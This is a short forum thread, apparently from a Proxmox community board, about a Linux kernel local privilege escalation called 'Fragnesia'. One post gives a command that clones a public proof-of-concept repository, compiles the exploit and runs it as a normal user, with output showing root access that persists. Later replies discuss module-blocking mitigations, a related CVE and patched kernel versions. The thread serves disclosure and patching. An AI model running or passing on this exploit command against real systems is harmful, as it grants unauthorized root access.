Fragnesia
- Thread starter michabbs
- Start date
In a virtual PVE, pve-no-subscription, both physical host and virtual host uptodate:
In a shell of a "normal" user:
After that is run once it stays active until the cache is cleared. Meanwhile:
Code:
root@pnb:~# pveversion
pve-manager/9.1.11/8eac2c86f015bdda (running kernel: 7.0.2-2-pve)
Code:
poc@pnb:~$ git clone https://github.com/v12-security/pocs.git && cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
#
# a lot of output...
# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)After that is run once it stays active until the cache is cleared. Meanwhile:
Code:
poc@pnb:~$ id
uid=1000(poc) gid=1000(poc) groups=1000(poc),100(users)
poc@pnb:~$ su -
# id
uid=0(root) gid=0(root) groups=0(root)
Last edited:
the upstream patches are still in flux, but the manual mitigations for copyfail and dirtyfrag (forbidding the affected modules) protect against the issue according to the reports so far. there will be an announcement as usual once fixed kernel packages become available.
Add ssh-keysign-pwn to the list, which has already been patched upstream:
https://www.phoronix.com/news/Linux-ssh-keysign-pwn
https://www.phoronix.com/news/Linux-7.0.8-Released
https://security-tracker.debian.org/tracker/CVE-2026-46333
https://ubuntu.com/security/CVE-2026-46333 (not yet)
https://www.phoronix.com/news/Linux-ssh-keysign-pwn
https://www.phoronix.com/news/Linux-7.0.8-Released
https://security-tracker.debian.org/tracker/CVE-2026-46333
https://ubuntu.com/security/CVE-2026-46333 (not yet)
Last edited:
patched kernels are on *-test, containing the fixes for both issues:
7.0.2-4
6.17.13-9
6.14.11-9
6.8.12-24
7.0.2-4
6.17.13-9
6.14.11-9
6.8.12-24